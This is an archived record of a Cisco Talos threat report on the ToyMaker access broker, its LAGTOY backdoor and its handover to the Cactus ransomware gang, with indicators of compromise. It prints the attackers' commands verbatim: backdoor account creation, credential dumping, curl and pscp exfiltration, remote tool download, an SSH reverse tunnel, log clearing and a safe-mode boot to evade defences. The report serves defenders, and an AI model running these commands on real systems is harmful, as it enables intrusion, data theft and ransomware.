{
	"id": "5c2285d3-ec1f-48a2-960b-7d69ebad120d",
	"created_at": "2026-04-06T00:17:26.11552Z",
	"updated_at": "2026-04-10T03:30:57.351169Z",
	"deleted_at": null,
	"sha1_hash": "deaff445b1398ed6f26183fdc58a672def8b56f1",
	"title": "Introducing ToyMaker, an initial access broker working in cahoots with double extortion gangs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 475507,
	"plain_text": "Introducing ToyMaker, an initial access broker working in cahoots\r\nwith double extortion gangs\r\nBy Joey Chen\r\nPublished: 2025-04-23 · Archived: 2026-04-05 20:16:05 UTC\r\nIn 2023, Cisco Talos discovered an extensive compromise in a critical infrastructure enterprise consisting\r\nof a combination of threat actors.\r\nFrom initial access to double extortion, these actors slowly and steadily compromised a multitude of hosts\r\nin the network using a combination of various dual-use remote administration, SSH and file transfer tools. \r\nThe initial access broker (IAB), whom Talos calls “ToyMaker” and assesses with medium confidence is a\r\nfinancially motivated threat actor, exploits vulnerable systems exposed to the internet. They deploy their\r\ncustom-made backdoor we call “LAGTOY” and extract credentials from the victim enterprise. LAGTOY\r\ncan be used to create reverse shells and execute commands on infected endpoints.\r\nA compromise by LAGTOY may result in access handover to a secondary threat actor. Specifically, we’ve\r\nobserved ToyMaker handover access to Cactus, a double extortion gang who employed their own tactics,\r\ntechniques and procedures (TTPs) to carry out malicious actions across the victim’s network.\r\nTurnaround time from ToyMaker to Cactus\r\nIntrusion analysis across various endpoints enabled Talos to build a timeline of events from initial compromise to\r\naccess handover to subsequent secondary malicious activity. The following is a high-level timeline of events:\r\nDay of activity Type of malicious activity Threat actor\r\nInitial compromise\r\nUser enumeration\r\nPreliminary recon\r\nFake user creation\r\nCredential extraction via Magnet RAM\r\nCapture\r\nToyMaker\r\n+2 day(s) Deploy LAGTOY implant ToyMaker\r\nhttps://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/\r\nPage 1 of 17\n\nLull in activity for 3 weeks\r\n+3 weeks aka Cactus\r\nday 0\r\nEndpoint enumeration Cactus\r\nCactus day 2\r\nServer and file enumeration\r\nIndicator removal\r\nCactus\r\nCactus day 2 and 3 Proliferation through enterprise Cactus\r\nCactus day 4\r\nArchiving sensitive data for exfiltration -\r\nextortion\r\nCactus\r\nCactus day 8\r\nRemote management tools deployment:\r\neHorus, RMS, AnyDesk\r\nOpenSSH connections\r\nCactus\r\nCactus day 12\r\nMalicious account creations for ransomware\r\ndeployment\r\nCactus\r\nCactus day 12\r\nDelete volume shadow copies\r\nBoot recovery modifications\r\nCactus\r\nAfter the initial compromise, ToyMaker performed preliminary reconnaissance, credential extraction and\r\nbackdoor deployment within the span of a week, after which they took no further activity. Talos did not observe\r\nany victim-specific data exfiltration nor did we observe attempts to discover and pivot to other valuable endpoints.\r\nAfter a lull in activity of approximately three weeks, we observed the Cactus ransomware group make its way into\r\nthe victim enterprise using credentials stolen by ToyMaker. Based on the relatively short dwell time, the lack of\r\ndata theft and the subsequent handover to Cactus, it is unlikely that ToyMaker had any espionage-motivated\r\nambitions or goals.\r\nTalos therefore assesses with medium confidence that ToyMaker is a financially-motivated initial access broker\r\n(IAB) who acquires access to high value organizations and then transfers that access to secondary threat actors\r\nhttps://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/\r\nPage 2 of 17\n\nwho usually monetize the access via double extortion and ransomware deployment.\r\nThe disparity in TTPs and timelines between the initial access conducted by ToyMaker and the secondary activity\r\nconducted by Cactus requires that both threats be modeled separately. However, it is imperative to establish\r\nrelationships between the two. In fact, similar connections need to be incorporated into paradigms used for threat\r\nmodeling any suspected IABs. In subsequent blogs, Talos will propose a new methodology for modeling and\r\ntracking compartmentalized and yet somewhat connected threats.\r\nToyMaker has been known to use a custom malware family — a backdoor Talos tracks as LAGTOY. ToyMaker\r\nusually infiltrates an organization's environment by successfully exploiting a known vulnerability in an unpatched\r\ninternet-facing server. Successful compromise almost immediately results in rapid reconnaissance of the system:\r\nCOMMAND INTENT\r\nwhoami\r\nnet user\r\nnet localgroup\r\nnet group\r\nnet user Administrator\r\nnltest /domain_trusts\r\nnet group Enterprise Admins\r\nSystem Information Discovery [T1082]\r\nipconfig /all Gather Victim Network Information [T1590]\r\nReconnaissance is followed by the creation of a fake user account named 'support':\r\nCOMMAND INTENT\r\nnet user support Sup0rtadmin /add\r\nnet localgroup administrators support /add\r\nCreate Account [T1136]\r\nFollowing this, the actor starts an SSH listener on the endpoint using the Windows OpenSSH package (sshd.exe).\r\nThe endpoint then receives a connection from another infected host on the network that creates a binary named\r\nhttps://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/\r\nPage 3 of 17\n\n'sftp-server.exe' which is the SFTP server module of OpenSSH. sftp-server.exe then connects to a remote host to\r\ndownload the Magnet RAM Capture executable:\r\nCOMMAND INTENT\r\nMRCv120.exe /accepteula /silent /go  extract credentials [T1003]\r\nMagnet RAM Capture is a freely available forensics tool used to obtain a memory dump of the host, from which\r\ncredentials can be harvested. This tactic likely explains the high number of compromised systems that Talos\r\nidentified during this campaign. \r\nThe memory dump is then archived using the 7za.exe archive creation command [T1560]:\r\n7za.exe a -p -mmt2 -mhe 1.7z 1.r\r\nSubsequently the archive is exfiltrated from the endpoint using PuTTY’s SCP utility (pscp) [T1048]:\r\npscp.exe-P 53 1.7z root@\u003cRemote_IP\u003e:/root\r\nOnce the attackers have obtained the memory dump, they use the sftp-server.exe connection again to download\r\nand execute a custom made reverse shell implant we’re calling “LAGTOY”.\r\nLAGTOY is persisted on the system by creating a service for it [T1543]:\r\nsc create WmiPrvSV start= auto error= ignore binPath= C:\\Program Files\\Common Files\\Services\\WmiPrvSV.exe\r\nThe implant reaches out to the C2 server configured in it to receive commands to execute on the endpoint such as:\r\nCOMMAND INTENT\r\ntasklist System Information Discovery [T1082]\r\nquser System Information Discovery [T1082]\r\nipconfig /all System Information Discovery [T1082]\r\nLAGTOY - ToyMaker’s staple backdoor\r\nLAGTOY is a simple yet effective implant. The backdoor is called HOLERUN by Mandiant. It is meant to\r\nperiodically reach out to the hard-coded C2 server and accept commands to execute on the infected endpoint. It is\r\nhttps://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/\r\nPage 4 of 17\n\ninstalled on the system as part of a service and contains rudimentary anti-debugging checks before initiating\r\nconnections to the C2.\r\nLAGTOY execution logic.\r\nAs an anti-debug technique, the malware registers a custom unhandled exception filter using the\r\nkernel32!SetUnhandledExceptionFilter(). If the malware is running under a debugger, the custom filter won’t be\r\ncalled and the exception will be passed to the debugger. Therefore, if the unhandled exception filter is registered\r\nand the control is passed to it, then the process is not running with a debugger.\r\nLAGTOY is intended to run on the infected system as a service with the name 'WmiPrvSV'. \r\nhttps://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/\r\nPage 5 of 17\n\nBoth the C2 IP address and the protocol port are hardcoded into LAGTOY.  The communication is done over port\r\n443 with a raw socket — not using TLS as one would expect on this TCP port.\r\nhttps://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/\r\nPage 6 of 17\n\nCommand and control communication.\r\nThe C2 will send specific administration codes to LAGTOY:\r\n'#pt' : Stop service.\r\n'#pd': Break from the current execution chain and check if the service has been stopped. If stopped then\r\nSleep for a specific time period and re-initiate connection to the C2.\r\n'#ps': Simply create the process/command specific.\r\nIf the code doesn’t begin with '#' then simply execute the provided command or process name on the\r\nendpoint.\r\nhttps://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/\r\nPage 7 of 17\n\nCommand recognition logic of LAGTOY.\r\nCompared with the sample discovered in 2022 by Mandiant, this sample added the '#ps' handler for creating\r\nprocess for command. \r\nhttps://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/\r\nPage 8 of 17\n\nSample in 2022 does not have the '#ps' parameter.\r\nTime-based execution \r\nLAGTOY uses a unique time-based logic to decide whether it needs to execute commands or Sleep for a specific\r\ntime period. Talos assesses with high confidence that this logic is a novel custom built unique to the LAGTOY\r\nfamily of implants.\r\nLAGTOY is able to process three commands from the C2 with a Sleep interval of 11000 milliseconds between\r\nthem. During its beaconing cycle it will record the last successful time of C2 communications and successful\r\ncommand execution. If the commands issued by the C2 have been failing for at least 30 minutes then the implant\r\nwill send a message to the C2 informing it of the failure to execute commands.\r\nLAGTOY has a watchdog routine embedded. If it has been running for a cumulative time of more than 60\r\nminutes, it will stop executing commands and then check if the service has been stopped. If the service is still\r\nactive then the implant will reinitiate connections to the C2.\r\nhttps://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/\r\nPage 9 of 17\n\nOverall timing and C2 communications logic of LAGTOY.\r\nToyMaker gives way to ransomware cartels\r\nAlmost a month after ToyMaker established access to the victim enterprise, the actor passed on the access to a\r\nsecondary threat actor, a Cactus ransomware affiliate, who primarily conducts ransomware and double extortion\r\noperations.\r\nThe Cactus gang conducted their own reconnaissance and persistence, deploying their own set of malware instead\r\nof using LAGTOY as a vehicle into the enterprise. Furthermore, they initially accessed the compromised endpoint\r\nusing compromised user credentials obtained earlier by ToyMaker using the Magnet RAM Capture tool.\r\nhttps://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/\r\nPage 10 of 17\n\nInitial recon and network scans\r\nCactus immediately began conducting network scans to identify systems of interest and proliferation. To spread\r\nacross the network, they first ran a WSMAN discovery script to enumerate all endpoints configured to handle\r\nPowerShell remoting.\r\nCOMMAND INTENT\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -\r\nExecutionPolicy Bypass -File .\\fs.ps1 result.csv\r\nRemote System Discovery\r\n[T1018]\r\nC:\\PerfLogs\\Admin\\7z.exe a -p\u003cpassword\u003e pss.7z .\\result.csv\r\nC:\\PerfLogs\\Admin\\curl.exe -k -T .\\pss.7z hxxps[:]//\u003cremote_ip\u003e:8443\r\nC:\\PerfLogs\\Admin\\7z.exe a -p\u003cpwd\u003e .\\CP-SERVER3.7z .\\CP-SERVER3.txt\r\nC:\\PerfLogs\\Admin\\7z.exe a -p\u003cpwd\u003e .\\FILEN01.7z .\\FILEN01.txt\r\nC:\\PerfLogs\\Admin\\curl[.]exe -k -T .\\CP-SERVER3.7z hxxps[://]\r\n\u003cremote_ip\u003e:8443\r\nC:\\PerfLogs\\Admin\\curl[.]exe -p -k -T .\\FILEN01.7z hxxps[://]\r\n\u003cremote_ip\u003e:8443\r\nC:\\PerfLogs\\Admin\\7z[.]exe a -p\u003cpwd\u003e .\\FILE-SERVER.7z .\\FILE-SERVER[.]txt\r\nC:\\PerfLogs\\Admin\\curl[.]exe -k -T .\\FILE-SERVER.7z hxxps[://]\r\n\u003cremote_ip\u003e:8443\r\nResults are then compressed and\r\nsent to a remote server.\r\nThe same is done for other\r\ninformation.\r\nData exfiltration [T1048]\r\nOnce the attackers had obtained the information they would clean up traces of their access:\r\nCOMMAND INTENT\r\nC:\\Windows\\system32\\reg.exe delete\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\r\n/f\r\nIndicator Removal: Clear\r\nCommand History [T1070]\r\nhttps://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/\r\nPage 11 of 17\n\nC:\\Windows\\system32\\reg.exe delete\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server\r\nClient\\Default /va /f\r\nC:\\Windows\\system32\\reg.exe delete\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server\r\nClient\\Servers /f\r\nC:\\Windows\\system32\\reg.exe add\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server\r\nClient\\Servers\r\nC:\\Windows\\system32\\attrib.exe %userprofile%\\documents\\Default.rdp -\r\ns -h\r\nIndicator Removal: Clear\r\nNetwork Connection History and\r\nConfigurations [T1070]\r\nnet user support /delete\r\nIndicator Removal: Clear\r\nPersistence[T1070]\r\nData Exfiltration\r\nThe harvested credentials provided ToyMaker access to a multitude of systems, on which the threat actor\r\nperformed reconnaissance for valuable information. These files were either archived and then exfiltrated using\r\nmultiple dual-use tools such as 7zip and curl or extracted directly using file transfer utilities such as WinSCP\r\n[T1560, T1048]:\r\nC:\\PerfLogs\\Admin\\7z.exe a -t7z -mx0 -v4g -spf -scsUTF-8 -bsp1 -ssw -p -xr!.ipa -xr!.apk -xr!.zip -xr!.rar -xr!.iso\r\n-xr!.dll -xr!.dl_ -xr!.lib -xr!.exe -xr!.ex_ -xr!.lnk -xr!.pdb -xr!.cab -xr!.msp -xr!.bak -xr!.old -xr!.bmp -xr!.gif -\r\nxr!.jpg -xr!.png -xr!.avi -xr!.m4v -xr!.mp4 -xr!.mp3 -xr!.wmv -xr!.wav -xr!.mov -xr!.mkv -xr!.log -xr!.csv -xr!*.jar\r\n-xr!test\\ -xr!tests\\ -xr!jdk8\\ e:\\tmp\u003cfilename\u003e\r\nC:\\PerfLogs\\Admin\\7z.exe a -t7z -mx0 -v4g -spf -scsUTF-8 -bsp1 -ssw -p\u003cpassword\u003e -xr!*.ipa -xr!*.apk -\r\nxr!*.zip -xr!*.rar -xr!*.iso -xr!*.dll -xr!*.dl_ -xr!*.lib -xr!*.exe -xr!*.ex_ -xr!*.lnk -xr!*.pdb -xr!*.cab -xr!*.msp -\r\nxr!*.bak -xr!*.old -xr!*.bmp -xr!*.gif -xr!*.jpg -xr!*.png -xr!*.avi -xr!*.m4v -xr!*.mp4 -xr!*.mp3 -xr!*.wmv -\r\nxr!*.wav -xr!*.mov -xr!*.mkv -xr!*.log -xr!*.csv -xr!*.jar -xr!test\\ -xr!tests\\ -xr!jdk8\\ e:\\tmp\\\u003cfilename\u003e\r\nOn other endpoints the attackers discovered and archived what is believed to be the victim’s customer data for\r\nexfiltration as well [T1560, T1048]:\r\nC:\\Windows\\system32\\cmd.exe /c \u003cpath\u003e\\7z.exe a -t7z -mx0 -ssp -spf -v5g -y -r -mhe=on \u003cpath\u003e\\0001.7z\r\n\u003cpath\u003ePrivate Folder\\Customers\\\u003cpath\u003e -p\u003cpassword\u003e\r\nCactus used a variety of remote admin tools on different endpoints to maintain long-term access. The tools\r\nincluded:\r\nhttps://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/\r\nPage 12 of 17\n\neHorus Agent: Remote control software also known as Pandora RC\r\nAnyDesk: Remote Desktop application\r\nRemote Utilities for Windows Admin (RMS Remote Admin): A Russian made remote management\r\ntool/platform\r\nOpenSSH: SSH package included and available for installation with the Windows OS\r\nThe remote administration utilities were downloaded from remote, attacker controlled locations via Powershell\r\nand Impacket:\r\nCOMMANDS from Impacket INTENT\r\ncmd.exe /Q /c powershell iwr -Uri\r\nhttp://\u003cremote_IP\u003e:7423/file.msi -OutFile\r\nC:\\Programdata\\f.msi 1\u003e \\\\127.0.0.1\\ADMIN$\\__\u003crandom\u003e\r\n2\u003e\u00261\r\nStage Capabilities: Upload Malware [T1608]\r\ncmd.exe /Q /c msiexec.exe /i C:\\Programdata\\f.msi /q\r\nEHUSER=\u003cusername\u003e STARTEHORUSSERVICE=1\r\nDESKTOPSHORTCUT=0 1\u003e\r\n\\\\127.0.0.1\\ADMIN$\\__\u003crandom\u003e 2\u003e\u00261\r\nSystem Binary Proxy Execution: Msiexec\r\n[T1218]\r\nIn another instance, the attackers created reverse shells using OpenSSH, where a scheduled task was created to\r\nconnect to the C2 server on an hourly basis to accept and execute commands:\r\nCOMMAND INTENT\r\nSCHTASKS /CREATE /RU SYSTEM /SC HOURLY /ST 14:00 /F /TN\r\nGoogleUpdateTaskMachine /TR cmd /c c:\\Windows\\temp\\sys_log.bat \u003e\r\nc:\\Windows\\temp\\log.txt\r\nScheduled Task/Job\r\n[T1053]\r\nSCHTASKS /CREATE /RU SYSTEM /SC HOURLY /ST 14:00 /F /TN\r\nGoogleUpdateTaskMachine /TR cmd /c FOR /L %N IN () DO\r\n(C:\\ProgramData\\ssh\\ssh.exe -o \"StrictHostKeyChecking no\" root@\u003cremote_ip\u003e -p\r\n443 -R 25369 -NCqf -i \"C:\\Windows\\temp\\syslog.txt\" \u0026 timeout /t 15)\r\nScheduled Task/Job\r\n[T1053]\r\nRemote services:SSH\r\n[T1021]\r\nhttps://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/\r\nPage 13 of 17\n\nCactus ransomware group takes its operational security seriously. They remove access to the file that contains the\r\nSSH private key used to exfiltrate information. This prevents the victim from reading the key under normal\r\ncircumstances. \r\nCOMMAND INTENT\r\nicacls C:\\Windows\\Temp\\syslog.txt\r\nicacls.exe C:\\Windows\\temp\\syslog.txt /c /t\r\n/inheritance:d\r\nicacls.exe C:\\Windows\\Temp\\syslog.txt /c /t\r\n/remove BUILTIN\\Administrators\r\nicacls.exe C:\\Windows\\Temp\\syslog.txt /c /t\r\n/remove \u003cuserid\u003e\r\nicacls.exe C:\\Windows\\temp\\syslog.txt\r\n/inheritance:r /grant SYSTEM:F\r\nFile and Directory Permissions\r\nModification: Windows File and Directory\r\nPermissions Modification [T1222]\r\nsyslog.txt is the Private Key used by the threat actor for\r\ninitiating SSH connection back to actor controlled\r\ninfrastructure.\r\nNew user accounts\r\nOn some endpoints, the malicious operators created new unauthorized user accounts, likely to facilitate\r\ndeployment of ransomware:\r\nnet user whiteninja \u003cpassword\u003e /add\r\nreg add HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon /v LegalNoticeText /t REG_SZ\r\n/d  /f\r\nreg add HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon /v DefaultUserName /t REG_SZ /d\r\nwhiteninja /f\r\nreg add HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon /v AutoLogonCount /t\r\nREG_DWORD /d 1 /f\r\nAbusing Safe Mode for defense evasion\r\nDuring our investigation, Talos found that the threat actor executed commands to reboot compromised hosts into\r\nSafe Mode with the following commands:\r\nbcdedit /set {default} safeboot minimal\r\nshutdown -r -f -t 0\r\nhttps://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/\r\nPage 14 of 17\n\nBooting a system into Safe Mode could be motivated by the intention to disable security products due to the fact\r\nthat the system loads a minimal set of drivers and services. Some security products might be inactive or limited\r\nunder Safe Mode, and the threat actor could leverage this to modify registry keys or settings to disable the security\r\nproducts completely [T1562.001].\r\nCactus also extensively uses Metasploit shellcode-injected copies of the Windows-based binaries Putty and\r\nApacheBench, which is a benchmarking tool for Apache HTTP servers to execute code on the compromised\r\nsystems. These will contact the same remote server used to host the portable eHorus agent, 51[.]81[.]42[.]234,\r\nover Ports 53, 443, 8343 and 9232. Cactus additionally employed ELF binaries generated by Metasploit\r\ncommunicating with the same remote C2 51[.]81[.]42[.]234.\r\nMetasploit shellcode communicating with the remote server.\r\nCoverage \r\nhttps://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/\r\nPage 15 of 17\n\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here. \r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here. \r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat. \r\nCisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically\r\nand alerts users of potentially unwanted activity on every connected device. \r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products. \r\nCisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. \r\nSecure Access provides seamless transparent and secure access to the internet, cloud services or private\r\napplication no matter where your users work.  Please contact your Cisco account representative or authorized\r\npartner if you are interested in a free trial of Cisco Secure Access. \r\nUmbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network.  \r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.  \r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center. \r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.  \r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nIndicators of Compromise (IOCs)\r\nIOCs for this threat can be found on our GitHub repository here.\r\nHashes - LAGTOY\r\nfdf977f0c20e7f42dd620db42d20c561208f85684d3c9efd12499a3549be3826\r\nMetasploit shells\r\n0a367cc7e7e297248fad57e27f83316b7606788db9468f59031fed811cfe4867\r\nhttps://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/\r\nPage 16 of 17\n\n0bcfea4983cfc2a55a8ac339384ecd0988a470af444ea8f3b597d5fe5f6067fb\r\n5831b09c93f305e7d0a49d4936478fac3890b97e065141f82cda9a0d75b1066d\r\n691cc4a12fbada29d093e57bd02ca372bc10968b706c95370daeee43054f06e3\r\n70077fde6c5fc5e4d607c75ff5312cc2fdf61ea08cae75f162d30fa7475880de\r\na95930ff02a0d13e4dbe603a33175dc73c0286cd53ae4a141baf99ae664f4132\r\nc1bd624e83382668939535d47082c0a6de1981ef2194bb4272b62ecc7be1ff6b\r\nNetwork IOCs\r\nToyMaker\r\n209[.]141[.]43[.]37\r\n194[.]156[.]98[.]155\r\n158[.]247[.]211[.]51\r\n39[.]106[.]141[.]68\r\n47[.]117[.]165[.]166\r\n195[.]123[.]240[.]2\r\n75[.]127[.]0[.]235\r\n149[.]102[.]243[.]100\r\nCactus\r\n206[.]188[.]196[.]20\r\n51[.]81[.]42[.]234\r\n178[.]175[.]134[.]52\r\n162[.]33[.]177[.]56\r\n64[.]52[.]80[.]252\r\n162[.]33[.]178[.]196\r\n103[.]199[.]16[.]92\r\nSource: https://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/\r\nhttps://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/\r\nPage 17 of 17",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/"
	],
	"report_names": [
		"introducing-toymaker-an-initial-access-broker"
	],
	"threat_actors": [
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434646,
	"ts_updated_at": 1775791857,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/deaff445b1398ed6f26183fdc58a672def8b56f1.pdf",
		"text": "https://archive.orkl.eu/deaff445b1398ed6f26183fdc58a672def8b56f1.txt",
		"img": "https://archive.orkl.eu/deaff445b1398ed6f26183fdc58a672def8b56f1.jpg"
	}
}